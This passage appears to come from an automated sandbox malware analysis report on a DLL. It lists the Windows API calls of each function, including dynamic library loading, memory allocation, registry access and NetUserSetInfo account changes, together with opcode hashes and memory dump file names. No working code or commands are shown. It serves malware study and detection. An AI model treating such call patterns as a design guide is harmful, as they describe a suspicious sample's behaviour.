                                                  • API String ID: 2574300362-1796993502
                                                  • Opcode ID: 70d1c982fd353c5bce6ba9069c55c9f3b3327870db499bb88831dc06457b352f
                                                  • Instruction ID: 49e302c505ebfc2fe9a727cf51ed991d364eebbc74c1095ce1966cd917e440ea
                                                  • Opcode Fuzzy Hash: 70d1c982fd353c5bce6ba9069c55c9f3b3327870db499bb88831dc06457b352f
                                                  • Instruction Fuzzy Hash: 77C092F8401228AFDB60AFA4DCCCE8D3A68FB453463A84544FA05A1624EB381080AB64
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $u%04x
                                                  • API String ID: 0-2846719512
                                                  • Opcode ID: 1f6d89d554986cdd82fb0e2794668e6e0531af68cd05daea2109b4fdf41f23a8
                                                  • Instruction ID: 926f1c216a8361e60bc3445ae8a78ded31acc7b6cea92631c0d95b6b2ff4fbf9
                                                  • Opcode Fuzzy Hash: 1f6d89d554986cdd82fb0e2794668e6e0531af68cd05daea2109b4fdf41f23a8
                                                  • Instruction Fuzzy Hash: A8615D616083C64FF713CE289C4075BBBD9EF962D4F28C46DE9C6C724AE761854A8352
                                                  APIs
                                                  • #825.MFC42(?,00000000,?,?,?,1001112D,00000000,000000FF,00000000,000000FF,00000000,?), ref: 100121D1
                                                  • #823.MFC42(00000000,00000000,?,?,?,1001112D,00000000,000000FF,00000000,000000FF,00000000,?), ref: 100121F6
                                                    • Part of subcall function 10012350: #540.MFC42(00000000,?,?,00000000), ref: 100123A6
                                                    • Part of subcall function 10012350: #540.MFC42(00000000,?,?,00000000), ref: 100123B3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: #540$#823#825
                                                  • String ID:
                                                  • API String ID: 3261958014-0
                                                  • Opcode ID: 103bab456209c4811671d232b7a5f097ed692de7c0e3af0ad8c5a2e5f0cf1076
                                                  • Instruction ID: a9c2cb30c09e7b4867e33a31c74d4a8efcae7c34899988356dee3da11abaa517
                                                  • Opcode Fuzzy Hash: 103bab456209c4811671d232b7a5f097ed692de7c0e3af0ad8c5a2e5f0cf1076
                                                  • Instruction Fuzzy Hash: E041C4F6B002049BDB04CF58D88452AF795EFD4260B19C56EED09DF346DA32ECA5C7A0
                                                  APIs
                                                  • #825.MFC42(00000000), ref: 10016211
                                                  • #823.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,100989E8,000000FF), ref: 10016221
                                                  • #823.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,100989E8,000000FF), ref: 100161BC
                                                    • Part of subcall function 10015610: RegOpenKeyExA.ADVAPI32(?,?,00000000,000F003F,?), ref: 100156E2
                                                  • #825.MFC42(?), ref: 100162A9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: #823#825$Open
                                                  • String ID:
                                                  • API String ID: 2004829228-0
                                                  • Opcode ID: eb5c59418274ab2aadd8da96b3e86e68d9ae56b9023ce0c1ad7b31d37aef0ebd
                                                  • Instruction ID: bce0d59b24e5e7cece5e08f0ce863fd29c34b19e2b5618ee4acec10938abe217
                                                  • Opcode Fuzzy Hash: eb5c59418274ab2aadd8da96b3e86e68d9ae56b9023ce0c1ad7b31d37aef0ebd
                                                  • Instruction Fuzzy Hash: 8541F375604A498BC708DF28DC91A6FB3D5FFC8610F88052CF9169B341DB36E949C792
                                                  APIs
                                                  • #825.MFC42(00000000), ref: 10015EB1
                                                  • #823.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,100989A8,000000FF), ref: 10015EC1
                                                  • #823.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,100989A8,000000FF), ref: 10015E5C
                                                    • Part of subcall function 10015610: RegOpenKeyExA.ADVAPI32(?,?,00000000,000F003F,?), ref: 100156E2
                                                  • #825.MFC42(?), ref: 10015F49
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: #823#825$Open
                                                  • String ID:
                                                  • API String ID: 2004829228-0
                                                  • Opcode ID: 98d1ea1c1581cd519bd7374e915b54f43815529a85f16872e6a8df6bbadbb9b5
                                                  • Instruction ID: 574233531b69ffa773c96334ab38d7ffb47452367a12adbc4b9678ea1af9b19e
                                                  • Opcode Fuzzy Hash: 98d1ea1c1581cd519bd7374e915b54f43815529a85f16872e6a8df6bbadbb9b5
                                                  • Instruction Fuzzy Hash: 72410275604645DBC708DE28C891A6BB3D5FBC8611F88052CF9568F341EB36EA49C793
                                                  APIs
                                                  • #825.MFC42(00000000), ref: 10015CE3
                                                  • #823.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,10098988), ref: 10015CF7
                                                  • #823.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,10098988), ref: 10015C88
                                                    • Part of subcall function 10015610: RegOpenKeyExA.ADVAPI32(?,?,00000000,000F003F,?), ref: 100156E2
                                                  • #825.MFC42(00000000), ref: 10015D76
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: #823#825$Open
                                                  • String ID:
                                                  • API String ID: 2004829228-0
                                                  • Opcode ID: a3a86b5ae27979fa43b838ab37d574446342f0cec2a0c29d713b066fcb1d0e54
                                                  • Instruction ID: 69ba1ccd52ce603d4bfe7cb3c909db8bba42efaff23af766ddf8a04ce65b47fd
                                                  • Opcode Fuzzy Hash: a3a86b5ae27979fa43b838ab37d574446342f0cec2a0c29d713b066fcb1d0e54
                                                  • Instruction Fuzzy Hash: B841FD35604645DFC708DE28D89166FB3E6FBC8610F88052CF9469B351DB32E989CB92
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: #823$strstr
                                                  • String ID:
                                                  • API String ID: 3700887599-0
                                                  • Opcode ID: 1feb712d2eb87b772129509cba575338db839c6f83ad0c279dda09971329dd7f
                                                  • Instruction ID: e7a3bb7836f99c4b21098aa8e2ae082227a5993f95023b9609139f1e4e40139e
                                                  • Opcode Fuzzy Hash: 1feb712d2eb87b772129509cba575338db839c6f83ad0c279dda09971329dd7f
                                                  • Instruction Fuzzy Hash: 1721AD3A2105180B871CC97DAC1152B7AC2FBC9631B6A432EFA2BC7BD1DEA5DD058380
                                                  APIs
                                                  • IsBadReadPtr.KERNEL32(?,00000014), ref: 10006D7E
                                                  • LoadLibraryA.KERNEL32(?), ref: 10006D9A
                                                    • Part of subcall function 100069B0: GetProcessHeap.KERNEL32(00000000,?,?), ref: 100069C0
                                                    • Part of subcall function 100069B0: HeapReAlloc.KERNEL32(00000000), ref: 100069C7
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 10006E08
                                                  • IsBadReadPtr.KERNEL32(?,00000014), ref: 10006E2F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: HeapRead$AddressAllocLibraryLoadProcProcess
                                                  • String ID:
                                                  • API String ID: 2932169029-0
                                                  • Opcode ID: 0bb20e24d639ff234c6774ad8937788d10a102b94a8500d5cb44c64d04d593d7
                                                  • Instruction ID: 24d0788afd7e564c21ce07679b2cd919d25d482a3edf121e110520330544f2d5
                                                  • Opcode Fuzzy Hash: 0bb20e24d639ff234c6774ad8937788d10a102b94a8500d5cb44c64d04d593d7
                                                  • Instruction Fuzzy Hash: 2C317E76B007069FE310CF29CC80A56B7E9FF493A4B26462AE919C7255EB31E815CB90
                                                  APIs
                                                  • ceil.MSVCRT ref: 10001D8C
                                                  • _ftol.MSVCRT ref: 10001D95
                                                  • VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,?,?,?,?,?,?,?,?,1001B646,?,000003C0), ref: 10001DA9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocVirtual_ftolceil
                                                  • String ID:
                                                  • API String ID: 3317677364-0
                                                  • Opcode ID: a938f9c99390067515d5bb401682070dd3e948cd9475bed688cee5d7a00ad51b
                                                  • Instruction ID: 80e73f680275ecb85cea3faadb907318f444ef36128b6434ffe1c43a84600ab4
                                                  • Opcode Fuzzy Hash: a938f9c99390067515d5bb401682070dd3e948cd9475bed688cee5d7a00ad51b
                                                  • Instruction Fuzzy Hash: 9911E4757083009BE704DF28EC8275ABBE4FBC03A1F04853EFD498B395DA75A809CA65
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _ftolceil
                                                  • String ID:
                                                  • API String ID: 2006273141-0
                                                  • Opcode ID: c13413cdfef608f17b66785ed65de3a9914b1a525c6f880948e7d8bc7dc34384
                                                  • Instruction ID: 62e5b31a19e4efc706719f2d7f8223bc0b5f5341a1f9df7ec71081677a67e64d
                                                  • Opcode Fuzzy Hash: c13413cdfef608f17b66785ed65de3a9914b1a525c6f880948e7d8bc7dc34384
                                                  • Instruction Fuzzy Hash: 2911A2756483049BE704EF28EC8676FBBE1FB84791F04853DF9498B344DA36A818C666
                                                  APIs
                                                  • LocalSize.KERNEL32(00000000), ref: 10015AAE
                                                  • LocalFree.KERNEL32(00000000), ref: 10015ABA
                                                  • LocalSize.KERNEL32(00000000), ref: 10015AD5
                                                  • LocalFree.KERNEL32(00000000), ref: 10015AE1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Local$FreeSize
                                                  • String ID:
                                                  • API String ID: 2726095061-0
                                                  • Opcode ID: c0206f096c02150c192f086eedc162ceac66f92a3276f0c0eb43a5dbeb93a699
                                                  • Instruction ID: 9d4eaa0da794f1e2b3889d11efc9f421fde940f342979db69ca44634e0eb0258
                                                  • Opcode Fuzzy Hash: c0206f096c02150c192f086eedc162ceac66f92a3276f0c0eb43a5dbeb93a699
                                                  • Instruction Fuzzy Hash: 2E11EEB9204654DBC221DB14CC91BBFB3D8FF85251F880629F9915F281DF39EC8586AA
                                                  APIs
                                                  • mbstowcs.MSVCRT ref: 10025257
                                                  • NetUserSetInfo.NETAPI32(00000000,?,000003F0,?,00000000,?,?,?), ref: 1002528E
                                                  • Sleep.KERNEL32(00000064,00000000,?,000003F0,?,00000000,?,?,?), ref: 100252B2
                                                    • Part of subcall function 10025700: LocalSize.KERNEL32(00000000), ref: 10025710
                                                    • Part of subcall function 10025700: LocalFree.KERNEL32(00000000,?,10025C00,00000001,?,00000000,00000001,?,?), ref: 10025720
                                                  • LocalFree.KERNEL32(?,?,?,?), ref: 100252C4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Local$Free$InfoSizeSleepUsermbstowcs
                                                  • String ID:
                                                  • API String ID: 2733533-0
                                                  • Opcode ID: 6a9604ccc34c4b0797383264fcae3a00f4c44b13357fa65a3340c00f3e20fbd0
                                                  • Instruction ID: 15c901b137dd358fda9146c8f6f94cc6f523190a05e50031364fc71d2f867a2a
                                                  • Opcode Fuzzy Hash: 6a9604ccc34c4b0797383264fcae3a00f4c44b13357fa65a3340c00f3e20fbd0
                                                  • Instruction Fuzzy Hash: 02110835218301ABE714CB28DC85FDB77D9AFD8705F044A2DF585822D1EBB4E54C8693
                                                  APIs
                                                  • WaitForSingleObject.KERNEL32(?,000000FF,00000000,00000000,?,00000000,10097CDC,000000FF,1001DDF6), ref: 100049DC
                                                  • CloseHandle.KERNEL32(?), ref: 100049FF
                                                  • CloseHandle.KERNEL32(?), ref: 10004A08
                                                  • WSACleanup.WS2_32 ref: 10004A0A
                                                    • Part of subcall function 10004F20: setsockopt.WS2_32(?,0000FFFF,00000080,00000000), ref: 10004F4A
                                                    • Part of subcall function 10004F20: CancelIo.KERNEL32(?), ref: 10004F57
                                                    • Part of subcall function 10004F20: InterlockedExchange.KERNEL32(?,00000000), ref: 10004F66
                                                    • Part of subcall function 10004F20: closesocket.WS2_32(?), ref: 10004F73
                                                    • Part of subcall function 10004F20: SetEvent.KERNEL32(?), ref: 10004F80
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseHandle$CancelCleanupEventExchangeInterlockedObjectSingleWaitclosesocketsetsockopt
                                                  • String ID:
                                                  • API String ID: 136543108-0
                                                  • Opcode ID: c40254e04adc77fad543b95add6b34e372d7ac014e393a6428c3a2a647f4d71d
                                                  • Instruction ID: af8d02120cf7308e6d709f2e7e2ecce89aa86b165303e1ddd931105c7dc64684
                                                  • Opcode Fuzzy Hash: c40254e04adc77fad543b95add6b34e372d7ac014e393a6428c3a2a647f4d71d
                                                  • Instruction Fuzzy Hash: B811BF79008B41DFD324DF28C844B9AB7E8EF85620F044B1CF0AA432D1DBB864098B63
                                                  APIs
                                                  • #537.MFC42(?,?,?,1009881F,000000FF,10007B21,?,00000000,00000000), ref: 10011E47
                                                  • #940.MFC42(?,?,?,?,1009881F,000000FF,10007B21,?,00000000,00000000), ref: 10011E7E
                                                  • #535.MFC42(?,?,?,?,?,1009881F,000000FF,10007B21,?,00000000,00000000), ref: 10011E8F
                                                  • #800.MFC42(?,?,?,?,?,1009881F,000000FF,10007B21,?,00000000,00000000), ref: 10011EA5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: #535#537#800#940
                                                  • String ID:
                                                  • API String ID: 1382806170-0
                                                  • Opcode ID: 6f5b847d5374a9d418dd2c0dc61e1757aeba104c962d883d24d17fcf50d4bf0c
                                                  • Instruction ID: 1b94c52f3496be9ecc741279a921140b636ff9e4308d57c3df3fe77fcebb6b55
                                                  • Opcode Fuzzy Hash: 6f5b847d5374a9d418dd2c0dc61e1757aeba104c962d883d24d17fcf50d4bf0c
                                                  • Instruction Fuzzy Hash: E2018B7550C7429FD304DF18C850B9BBBE1EB95764F408A0DF895872A2DB74E84A8B92
                                                  APIs
                                                  Memory Dump Source
